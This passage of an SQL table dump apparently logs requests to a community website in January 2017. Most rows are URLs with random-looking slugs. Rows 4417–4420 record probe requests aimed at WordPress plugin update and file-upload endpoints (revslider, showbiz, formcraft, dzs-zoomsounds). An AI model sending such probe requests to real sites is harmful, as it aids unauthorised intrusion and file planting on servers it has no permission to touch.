00:00:00'),(4292,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-i20162636-k34580-mxagfpap-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-10 17:24:39','0000-00-00 00:00:00'),(4293,'http://www.hallcrestheights.org/k19664-pcscq-i20162633-rufu-npkw-xpoideot.htm',NULL,'','',1,0,'2017-01-10 17:28:05','0000-00-00 00:00:00'),(4294,'http://www.hallcrestheights.org/lugdl-trsm-i20162632-xxhy-pzqjllzo-k60964-hnjumnte.htm',NULL,'','',1,0,'2017-01-10 17:38:53','0000-00-00 00:00:00'),(4295,'http://www.hallcrestheights.org/jglet-kymd-rqzn-i20162633-rvmlkswa-k19564-zvkecqqn.htm',NULL,'','',1,0,'2017-01-10 17:43:26','0000-00-00 00:00:00'),(4296,'http://www.hallcrestheights.org/edzvd-lqco-k60764-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk.htm',NULL,'','',1,0,'2017-01-10 17:44:26','0000-00-00 00:00:00'),(4297,'http://www.hallcrestheights.org/lugdl-trsm-k19364-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy.htm',NULL,'','',1,0,'2017-01-10 17:47:43','0000-00-00 00:00:00'),(4298,'http://www.hallcrestheights.org/kzpffmsx-k17341-klrd-edhwgef-i20162633-vbbgzagp-eciyyuwu/',NULL,'','',1,0,'2017-01-10 17:47:57','0000-00-00 00:00:00'),(4299,'http://www.hallcrestheights.org/k19264-ixnmu-i20162633-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq.htm',NULL,'','',1,0,'2017-01-10 17:51:46','0000-00-00 00:00:00'),(4300,'http://www.hallcrestheights.org/i20162632-dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-k61564-xzmnp.htm',NULL,'','',1,0,'2017-01-10 17:55:22','0000-00-00 00:00:00'),(4301,'http://www.hallcrestheights.org/i20162632-jglet-kymd-rqzn-rvmlkswa-k61164-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-10 17:58:41','0000-00-00 00:00:00'),(4302,'http://www.hallcrestheights.org/upttm-i20162633-nbea-tgrb-nqcdcncx-k19764-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-10 18:02:17','0000-00-00 00:00:00'),(4303,'http://www.hallcrestheights.org/zmkue-k18964-dtzj-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-01-10 18:12:56','0000-00-00 00:00:00'),(4304,'http://www.hallcrestheights.org/pcscq-k61264-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-10 18:16:28','0000-00-00 00:00:00'),(4305,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k60864-eyooayik-uksszq-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-10 18:20:04','0000-00-00 00:00:00'),(4306,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k19464-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',2,0,'2017-01-10 18:26:47','0000-00-00 00:00:00'),(4307,'http://www.hallcrestheights.org/tkuy-i20162629-kfjdnjj-bucyupa-jaylr-lwfvd-k27005-yruqpkl/',NULL,'','',1,0,'2017-01-10 18:31:03','0000-00-00 00:00:00'),(4308,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-i20162632-bptqu-k61464-hzxchh-rmxag-fpapuhg-fqvjdcl.htm',NULL,'','',1,0,'2017-01-10 18:34:57','0000-00-00 00:00:00'),(4309,'http://www.hallcrestheights.org/edzvd-lqco-k19164-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-i20162633-umbhmg-znkoh-eyrupxp-udzikmu.htm',NULL,'','',1,0,'2017-01-10 18:39:23','0000-00-00 00:00:00'),(4310,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik-ghhmb-k26105-bxpgesm/',NULL,'','',1,0,'2017-01-10 18:41:43','0000-00-00 00:00:00'),(4311,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg-kucyb-npzkic-k19064-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-01-10 18:46:48','0000-00-00 00:00:00'),(4312,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv-yxjlt-feobke-k61364-bwivs-mqkrfbm-lkmstho-wgwh.htm',NULL,'','',1,0,'2017-01-10 18:50:00','0000-00-00 00:00:00'),(4313,'http://www.hallcrestheights.org/bsoa-i20162629-pazapst-asgmhcq-cmckf-rdtfk-k49145-gpvbchs/',NULL,'','',1,0,'2017-01-10 18:59:18','0000-00-00 00:00:00'),(4314,'http://www.hallcrestheights.org/i20162632-k50264-mrcqg-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-10 19:03:47','0000-00-00 00:00:00'),(4315,'http://www.hallcrestheights.org/htxw-hykrsvs-i20162630-vhudykb-qxdos-fiety-k27545-uaixnrb/',NULL,'','',1,0,'2017-01-10 19:08:38','0000-00-00 00:00:00'),(4316,'http://www.hallcrestheights.org/fadla-jfnl-i20162632-gfpc-vwgmyhde-k51064-cwxbdeud.htm',NULL,'','',1,0,'2017-01-10 19:10:02','0000-00-00 00:00:00'),(4317,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh-k50164-xptvuhmi.htm',NULL,'','',1,0,'2017-01-10 19:13:34','0000-00-00 00:00:00'),(4318,'http://www.hallcrestheights.org/tkuyk-i20162635-fjdnjj-bucyu-paja-ylrlwfv-k21857-dyruqpkl/',NULL,'','',1,0,'2017-01-10 19:18:09','0000-00-00 00:00:00'),(4319,'http://www.hallcrestheights.org/pcscq-rufu-k50864-npkw-xpoideot-i20162632-wtvsoarm-osmgep.htm',NULL,'','',1,0,'2017-01-10 19:20:52','0000-00-00 00:00:00'),(4320,'http://www.hallcrestheights.org/upttm-i20162633-nbea-tgrb-nqcdcncx-rdhcpgzz-k9364-dllimv-yxjlt.htm',NULL,'','',1,0,'2017-01-10 19:27:25','0000-00-00 00:00:00'),(4321,'http://www.hallcrestheights.org/i20162632-k50764-jglet-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',1,0,'2017-01-10 19:31:05','0000-00-00 00:00:00'),(4322,'http://www.hallcrestheights.org/lugdl-i20162633-trsm-xxhy-pzqjllzo-k8964-hnjumnte-cwfogy-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-10 19:35:29','0000-00-00 00:00:00'),(4323,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao-fifephi-ijimj-njbog-k29705-tsakbcc/',NULL,'','',1,0,'2017-01-10 19:40:36','0000-00-00 00:00:00'),(4324,'http://www.hallcrestheights.org/oiyi-i20162629-zgolrcm-wfbsnop-dgfnh-skrlj-k47705-rgfctfz/',NULL,'','',1,0,'2017-01-10 19:45:52','0000-00-00 00:00:00'),(4325,'http://www.hallcrestheights.org/tkuy-i20162629-kfjdnjj-bucyupa-jaylr-lwfvd-k50405-yruqpkl/',NULL,'','',1,0,'2017-01-10 19:52:09','0000-00-00 00:00:00'),(4326,'http://www.hallcrestheights.org/xhaj-i20162629-vqlwczb-iqsosqx-oqkgq-aqydc-k48245-ptznzvt/',NULL,'','',1,0,'2017-01-10 19:59:50','0000-00-00 00:00:00'),(4327,'http://www.hallcrestheights.org/i20162632-edzvd-lqco-mnnm-mcawvbfu-k50364-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-10 20:01:15','0000-00-00 00:00:00'),(4328,'http://www.hallcrestheights.org/yembjvht-qqdc-kzfltzt-erqbwnsw-nsnjplpf-i20162633-k18041-trrj/',NULL,'','',1,0,'2017-01-10 20:11:13','0000-00-00 00:00:00'),(4329,'http://www.hallcrestheights.org/ryvhr-k9064-hmqt-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh-aoxrc-jhwuvd-svezy.htm',NULL,'','',1,0,'2017-01-10 20:14:17','0000-00-00 00:00:00'),(4330,'http://www.hallcrestheights.org/ixnmu-k50464-eahw-hioz-hjxbnwpg-i20162632-eyooayik-uksszq-cebaq-domytn-iholb.htm',NULL,'','',1,0,'2017-01-10 20:17:52','0000-00-00 00:00:00'),(4331,'http://www.hallcrestheights.org/upttm-nbea-i20162632-tgrb-nqcdcncx-k50964-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-10 20:21:36','0000-00-00 00:00:00'),(4332,'http://www.hallcrestheights.org/pcscq-rufu-k9264-npkw-xpoideot-wtvsoarm-osmgep-lalhe-i20162633-liyrqi-yqfuf-xvugowo-pegtqam.htm',NULL,'','',1,0,'2017-01-10 20:27:59','0000-00-00 00:00:00'),(4333,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-i20162632-aoxrc-jhwuvd-svezy-k50664-twlcycw-scpuakq.htm',NULL,'','',1,0,'2017-01-10 20:34:05','0000-00-00 00:00:00'),(4334,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa-zvkecqqn-i20162633-eeiaqj-zlnpl-qfcneb-k9164-xilnv-oxbdjve-ebikptj-vlxf.htm',NULL,'','',1,0,'2017-01-10 20:34:17','0000-00-00 00:00:00'),(4335,'http://www.hallcrestheights.org/cwhriwgp-ekzq-i20162630-dwkvumz-bsaiimjz-fozgdvdd-k38201-qjvd/',NULL,'','',1,0,'2017-01-10 20:36:11','0000-00-00 00:00:00'),(4336,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-i20162632-hnjumnte-cwfogy-wbiwy-rurfgv-k50564-fcwqz-hribnkn-yfeebsb-jhfk.htm',NULL,'','',1,0,'2017-01-10 20:39:40','0000-00-00 00:00:00'),(4337,'http://www.hallcrestheights.org/i20162632-k40364-jglet-kymd-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-10 20:44:09','0000-00-00 00:00:00'),(4338,'http://www.hallcrestheights.org/ajqx-k8905-xucuzao-fifephi-ijimj-i20162629-njbog-tsakbcc-gyfm/',NULL,'','',1,0,'2017-01-10 20:46:26','0000-00-00 00:00:00'),(4339,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-k6205-jaylr-i20162629-lwfvd-yruqpkl-sdef/',NULL,'','',1,0,'2017-01-10 20:51:16','0000-00-00 00:00:00'),(4340,'http://www.hallcrestheights.org/i20162632-k61964-mrcqg-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-10 20:53:38','0000-00-00 00:00:00'),(4341,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge/k28755-fvbbg-zagpe-i20162629-ciyyuwu-vfzt-jigjinam/',NULL,'','',1,0,'2017-01-10 20:56:18','0000-00-00 00:00:00'),(4342,'http://www.hallcrestheights.org/mrcqg-beif-i20162632-uwgr-abtnwyrq-k41164-semgwkow.htm',NULL,'','',1,0,'2017-01-10 20:58:48','0000-00-00 00:00:00'),(4343,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-aylrlwfv-dyruqpkl-i20162633-k39641-sdef/',NULL,'','',1,0,'2017-01-10 21:03:49','0000-00-00 00:00:00'),(4344,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm-bbxpgesm-i20162633-k38741-rcai/',NULL,'','',1,0,'2017-01-10 21:16:01','0000-00-00 00:00:00'),(4345,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii-jimjnjbo-gtsakbcc-i20162633-k18941-gyfm/',NULL,'','',1,0,'2017-01-10 21:24:32','0000-00-00 00:00:00'),(4346,'http://www.hallcrestheights.org/htxwhykr-svsv-i20162630-hudykbq-xdosfiet-yuaixnrb-k58901-dggs/',NULL,'','',1,0,'2017-01-10 21:45:51','0000-00-00 00:00:00'),(4347,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos-k6745-fiety-i20162630-uaixnrb-dggs/',NULL,'','',1,0,'2017-01-10 21:57:09','0000-00-00 00:00:00'),(4348,'http://www.hallcrestheights.org/oiyizgo-k8653-lrcmw-fbsnop-dgfnhs-krljr-gfct-i20162631-fzfiwx/',NULL,'','',1,0,'2017-01-10 22:31:01','0000-00-00 00:00:00'),(4349,'http://www.hallcrestheights.org/bsoapaza-psta-sgmhcqc-mckfrdtf-i20162632-kgpvbchs-k59441-iwho/',NULL,'','',1,0,'2017-01-10 22:38:35','0000-00-00 00:00:00'),(4350,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162632-yysl-lgeajanp-k40264-dmefnxhq.htm',NULL,'','',1,0,'2017-01-10 22:42:24','0000-00-00 00:00:00'),(4351,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh-k61864-xptvuhmi.htm',NULL,'','',1,0,'2017-01-10 22:46:09','0000-00-00 00:00:00'),(4352,'http://www.hallcrestheights.org/gnfzn-xvjx-k61664-palt-itjshkyj-i20162632-yldpijaa-mdurta.htm',NULL,'','',1,0,'2017-01-10 22:49:57','0000-00-00 00:00:00'),(4353,'http://www.hallcrestheights.org/vqjny-spvh-k40964-oljp-eurrtpil-i20162632-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-10 22:54:21','0000-00-00 00:00:00'),(4354,'http://www.hallcrestheights.org/soegs-k53407-zxyife-tvtnd-yuuh/vfcyzls-xxqroxae-i20162634-hkskxyxe-mbuqudt-wqceyvuc/',NULL,'','',1,0,'2017-01-10 22:55:43','0000-00-00 00:00:00'),(4355,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx-palt-itjshkyj-yldpijaa-k40864-mdurta-enpgg.htm',NULL,'','',1,0,'2017-01-10 23:01:20','0000-00-00 00:00:00'),(4356,'http://www.hallcrestheights.org/i20162632-k40464-pcscq-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-10 23:08:51','0000-00-00 00:00:00'),(4357,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-terqbw-nswns-i20162630-njpl-k36553-pftrrj/',NULL,'','',1,0,'2017-01-10 23:16:26','0000-00-00 00:00:00'),(4358,'http://www.hallcrestheights.org/i20162632-k62064-edzvd-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-10 23:20:22','0000-00-00 00:00:00'),(4359,'http://www.hallcrestheights.org/upttm-k40564-nbea-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-10 23:23:59','0000-00-00 00:00:00'),(4360,'http://www.hallcrestheights.org/vqjny-spvh-i20162632-oljp-eurrtpil-k61764-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib.htm',NULL,'','',1,0,'2017-01-10 23:27:46','0000-00-00 00:00:00'),(4361,'http://www.hallcrestheights.org/lugdl-trsm-i20162632-xxhy-pzqjllzo-k40164-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-10 23:31:33','0000-00-00 00:00:00'),(4362,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-fvbbg-i20162629-zagpe-k47605-ciyyuwu-vfzt/',NULL,'','',1,0,'2017-01-10 23:35:20','0000-00-00 00:00:00'),(4363,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh-k41064-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-10 23:39:08','0000-00-00 00:00:00'),(4364,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-i20162632-xzmnp-zvsgcr-lycmc-k40764-zoqqelu-dpwcmeg.htm',NULL,'','',1,0,'2017-01-10 23:42:54','0000-00-00 00:00:00'),(4365,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-i20162632-cwxbdeud-kovfii-bptqu-hzxchh-k40664-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-10 23:46:42','0000-00-00 00:00:00'),(4366,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq-aqydc-i20162630-k27445-ptznzvt-jqoe/',NULL,'','',1,0,'2017-01-10 23:50:29','0000-00-00 00:00:00'),(4367,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-fvbbgz-agpec-i20162630-k24673-iyyu-wuvfzt/',NULL,'','',1,0,'2017-01-10 23:54:15','0000-00-00 00:00:00'),(4368,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-k49045-vtzpx-i20162629-bxkcw-jybtylw-osdu/',NULL,'','',1,0,'2017-01-11 00:01:50','0000-00-00 00:00:00'),(4369,'http://www.hallcrestheights.org/k57253-qlbowci-ggece-ayafxr-glnikg-hhmbb-i20162630-xpge-smrcai/',NULL,'','',1,0,'2017-01-11 00:05:36','0000-00-00 00:00:00'),(4370,'http://www.hallcrestheights.org/tkuy-kfjdnjj-k29605-bucyupa-jaylr-i20162629-lwfvd-yruqpkl-sdef/',NULL,'','',1,0,'2017-01-11 00:09:23','0000-00-00 00:00:00'),(4371,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-jaylrl-k58153-wfvdy-i20162630-ruqp-klsdef/',NULL,'','',1,0,'2017-01-11 00:13:10','0000-00-00 00:00:00'),(4372,'http://www.hallcrestheights.org/bsoapa-i20162633-zapstasg-k8689-mhcq-cmckf-rdtf-kgpvbch-siwhork/',NULL,'','',1,0,'2017-01-11 00:16:57','0000-00-00 00:00:00'),(4373,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-i20162628-zbsai-k57649-imjz-fozgdvd-dqjvdob/',NULL,'','',1,0,'2017-01-11 00:24:33','0000-00-00 00:00:00'),(4374,'http://www.hallcrestheights.org/k38101-htxwhykr-svsv-hudykbq-xdosfiet-yuaixnrb-i20162630-dggs-aarh/',NULL,'','',1,0,'2017-01-11 00:28:18','0000-00-00 00:00:00'),(4375,'http://www.hallcrestheights.org/i20162632-kzpffmsx-klrd-edhwgef-vbbgzagp-eciyyuwu-vfzt-k60241-jigj/',NULL,'','',1,0,'2017-01-11 00:32:05','0000-00-00 00:00:00'),(4376,'http://www.hallcrestheights.org/bsoapaza-i20162633-k38641-psta-sgmhcqc-mckfrdtf-kgpvbchs-iwho-rklv/',NULL,'','',1,0,'2017-01-11 00:39:39','0000-00-00 00:00:00'),(4377,'http://www.hallcrestheights.org/xhajvqlw-k58801-czbi-qsosqxo-qkgqaqyd-cptznzvt-i20162630-jqoe-vpca/',NULL,'','',1,0,'2017-01-11 00:43:26','0000-00-00 00:00:00'),(4378,'http://www.hallcrestheights.org/oiyiz-k21757-golrcm-wfbsn-i20162635-opdg-fnhskrl-jrgfctfz-fiwxwmak/',NULL,'','',1,0,'2017-01-11 00:47:13','0000-00-00 00:00:00'),(4379,'http://www.hallcrestheights.org/k17941-qlbowcig-i20162633-gece-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi/',NULL,'','',1,0,'2017-01-11 00:51:00','0000-00-00 00:00:00'),(4380,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf-ietyu-k8253-aixn-rbdggs-i20162631-aarhef/',NULL,'','',1,0,'2017-01-11 00:54:47','0000-00-00 00:00:00'),(4381,'http://www.hallcrestheights.org/xhajvql-k24273-wczbi-qsosqx-oqkgqa-qydcp-tznz-i20162630-vtjqoe-vpcaqw/',NULL,'','',1,0,'2017-01-11 00:58:34','0000-00-00 00:00:00'),(4382,'http://www.hallcrestheights.org/cwhriwg-k57753-pekzq-dwkvum-zbsaii-mjzfo-zgdv-i20162630-ddqjvd-obknly/',NULL,'','',1,0,'2017-01-11 01:01:29','0000-00-00 00:00:00'),(4383,'http://www.hallcrestheights.org/ajqxxuc-k36153-uzaof-ifephi-ijimjn-jbogt-sakb-i20162630-ccgyfm-dvjuxz/',NULL,'','',1,0,'2017-01-11 01:01:38','0000-00-00 00:00:00'),(4384,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-jaylrl-wfvdy-k56853-ruqp-i20162630-klsdef-hxdfpd/',NULL,'','',1,0,'2017-01-11 01:01:47','0000-00-00 00:00:00'),(4385,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-ijimj-njbog-i20162629-k7605-tsakbcc-gyfm-dvjuxzle/',NULL,'','',1,0,'2017-01-11 01:07:33','0000-00-00 00:00:00'),(4386,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-jaylr-lwfvd-k7245-yruqpkl-i20162630-sdef-hxdfpdfu/',NULL,'','',1,0,'2017-01-11 01:15:07','0000-00-00 00:00:00'),(4387,'http://www.hallcrestheights.org/soeg-k8505-szxyife-tvtndyu-uhvfc-yzlsx-i20162629-xqroxae-hksk-xyxembuq/',NULL,'','',1,0,'2017-01-11 01:26:28','0000-00-00 00:00:00'),(4388,'http://www.hallcrestheights.org/qlbo-k6345-wciggec-eayafxr-glnik-ghhmb-bxpgesm-i20162630-rcai-ztbiauwd/',NULL,'','',1,0,'2017-01-11 01:30:15','0000-00-00 00:00:00'),(4389,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-zbsai-imjzf-i20162629-k5805-ozgdvdd-qjvd-obknlykc/',NULL,'','',1,0,'2017-01-11 01:34:03','0000-00-00 00:00:00'),(4390,'http://www.hallcrestheights.org/htxw-k26505-hykrsvs-vhudykb-qxdos-fiety-i20162629-uaixnrb-dggs-aarhefsk/',NULL,'','',1,0,'2017-01-11 01:37:58','0000-00-00 00:00:00'),(4391,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-ektsls-i20162629-k36699-hxos/',NULL,'','',1,0,'2017-01-11 01:46:59','0000-00-00 00:00:00'),(4392,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq-aqydc-i20162629-k47205-ptznzvt-jqoe-vpcaqwja/',NULL,'','',1,0,'2017-01-11 01:49:10','0000-00-00 00:00:00'),(4393,'http://www.hallcrestheights.org/bsoa-k48105-pazapst-asgmhcq-cmckf-rdtfk-i20162629-gpvbchs-iwho-rklvzrtj/',NULL,'','',1,0,'2017-01-11 01:52:57','0000-00-00 00:00:00'),(4394,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik-ghhmb-i20162629-k27405-bxpgesm-rcai-ztbiauwd/',NULL,'','',1,0,'2017-01-11 01:56:44','0000-00-00 00:00:00'),(4395,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik-ghhmb-i20162629-k50805-bxpgesm-rcai-ztbiauwd/',NULL,'','',1,0,'2017-01-11 02:04:18','0000-00-00 00:00:00'),(4396,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-fvbbg-zagpe-i20162629-k48645-ciyyuwu-vfzt-jigjinam/',NULL,'','',1,0,'2017-01-11 02:08:05','0000-00-00 00:00:00'),(4397,'http://www.hallcrestheights.org/yemb-k30105-jvhtqqd-ckzfltz-terqb-wnswn-i20162629-snjplpf-trrj-ncypjoqw/',NULL,'','',1,0,'2017-01-11 02:11:52','0000-00-00 00:00:00'),(4398,'http://www.hallcrestheights.org/oiyi-k27945-zgolrcm-wfbsnop-dgfnh-skrlj-rgfctfz-i20162630-fiwx-wmakoayo/',NULL,'','',1,0,'2017-01-11 02:15:39','0000-00-00 00:00:00'),(4399,'http://www.hallcrestheights.org/i20162632-xhajvqlw-k59841-czbi-qsosqxo-qkgqaqyd-cptznzvt-jqoe-vpca-qwjal/',NULL,'','',1,0,'2017-01-11 02:23:13','0000-00-00 00:00:00'),(4400,'http://www.hallcrestheights.org/oiyizgol-i20162633-k38241-rcmw-fbsnopd-gfnhskrl-jrgfctfz-fiwx-wmak-oayos/',NULL,'','',1,0,'2017-01-11 02:27:00','0000-00-00 00:00:00'),(4401,'http://www.hallcrestheights.org/bsoapaza-k58401-psta-sgmhcqc-mckfrdtf-kgpvbchs-iwho-i20162630-rklv-zrtjr/',NULL,'','',1,0,'2017-01-11 02:30:47','0000-00-00 00:00:00'),(4402,'http://www.hallcrestheights.org/tkuykfjd-i20162633-njjb-ucyupaj-aylrlwfv-dyruqpkl-k17541-sdef-hxdf-pdfuf/',NULL,'','',1,0,'2017-01-11 02:34:34','0000-00-00 00:00:00'),(4403,'http://www.hallcrestheights.org/htxwhykr-i20162633-svsv-hudykbq-xdosfiet-yuaixnrb-k39141-dggs-aarh-efskj/',NULL,'','',1,0,'2017-01-11 02:38:21','0000-00-00 00:00:00'),(4404,'http://www.hallcrestheights.org/cwhri-k657-wgpekz-qdwkv-i20162635-umzb-saiimjz-fozgdvdd-qjvdobkn-lykcone/',NULL,'','',1,0,'2017-01-11 02:42:08','0000-00-00 00:00:00'),(4405,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl-jrgfctfz-k59301-fiwx-i20162630-wmak-oayos/',NULL,'','',1,0,'2017-01-11 02:45:55','0000-00-00 00:00:00'),(4406,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm-bbxpgesm-k37701-rcai-i20162630-ztbi-auwdt/',NULL,'','',1,0,'2017-01-11 02:50:04','0000-00-00 00:00:00'),(4407,'http://www.hallcrestheights.org/cwhriwgp-i20162633-k18441-ekzq-dwkvumz-bsaiimjz-fozgdvdd-qjvd-obkn-lykco/',NULL,'','',1,0,'2017-01-11 02:53:35','0000-00-00 00:00:00'),(4408,'http://www.hallcrestheights.org/qlbowcig-i20162633-k40041-gece-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi-auwdt/',NULL,'','',1,0,'2017-01-11 02:57:16','0000-00-00 00:00:00'),(4409,'http://www.hallcrestheights.org/qlbow-k22257-ciggec-eayaf-i20162635-xrgl-nikghhm-bbxpgesm-rcaiztbi-auwdtvi/',NULL,'','',1,0,'2017-01-11 03:01:03','0000-00-00 00:00:00'),(4410,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-i20162635-kbqx-dosfiet-k21357-yuaixnrb-dggsaarh-efskjyd/',NULL,'','',1,0,'2017-01-11 03:04:50','0000-00-00 00:00:00'),(4411,'http://www.hallcrestheights.org/wbwp-i20162629-k7705-bonkydh-xjjikvf-vtzpx-bxkcw-jybtylw-osdu-ieqgwsog-xhgpi/',NULL,'','',1,0,'2017-01-11 03:08:37','0000-00-00 00:00:00'),(4412,'http://www.hallcrestheights.org/kzpf-i20162629-k8605-fmsxklr-dedhwge-fvbbg-zagpe-ciyyuwu-vfzt-jigjinam-zbcng/',NULL,'','',1,0,'2017-01-11 03:16:11','0000-00-00 00:00:00'),(4413,'http://www.hallcrestheights.org/cwhriwg-k8353-pekzq-dwkvum-i20162631-zbsaii-mjzfo-zgdv-ddqjvd-obknly-kconedw/',NULL,'','',1,0,'2017-01-11 03:23:45','0000-00-00 00:00:00'),(4414,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-tvixp-mtzhzz-wzrqr-k28055-dcfpsmf/',NULL,'','',1,0,'2017-01-11 03:28:21','0000-00-00 00:00:00'),(4415,'http://www.hallcrestheights.org/yemb-k6445-jvhtqqd-i20162630-ckzfltz-terqb-wnswn-snjplpf-trrj-ncypjoqw-gzjev/',NULL,'','',1,0,'2017-01-11 03:31:19','0000-00-00 00:00:00'),(4416,'http://www.hallcrestheights.org/tkuykfj-k7453-dnjjb-ucyupa-i20162631-jaylrl-wfvdy-ruqp-klsdef-hxdfpd-fufpfaj/',NULL,'','',1,0,'2017-01-11 03:35:06','0000-00-00 00:00:00'),(4417,'http://hallcrestheights.org//wp-admin///admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin',NULL,'','',1,0,'2017-01-11 03:35:42','0000-00-00 00:00:00'),(4418,'http://hallcrestheights.org/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin',NULL,'','',1,0,'2017-01-11 03:35:43','0000-00-00 00:00:00'),(4419,'http://hallcrestheights.org////wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'','',1,0,'2017-01-11 03:38:01','0000-00-00 00:00:00'),(4420,'http://hallcrestheights.org///wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'','',1,0,'2017-01-11 03:40:29','0000-00-00 00:00:00'),(4421,'http://www.hallcrestheights.org/soeg-i20162629-k5905-szxyife-tvtndyu-uhvfc-yzlsx-xqroxae-hksk-xyxembuq-udtwq/',NULL,'','',1,0,'2017-01-11 03:57:48','0000-00-00 00:00:00'),(4422,'http://www.hallcrestheights.org/ajqxxucu-k17641-zaof-ifephii-jimjnjbo-gtsakbcc-i20162633-gyfm-dvju-xzlek-tsls/',NULL,'','',1,0,'2017-01-11 04:01:35','0000-00-00 00:00:00'),(4423,'http://www.hallcrestheights.org/qlbo-k27145-wciggec-i20162630-eayafxr-glnik-ghhmb-bxpgesm-rcai-ztbiauwd-tvixp/',NULL,'','',1,0,'2017-01-11 04:09:09','0000-00-00 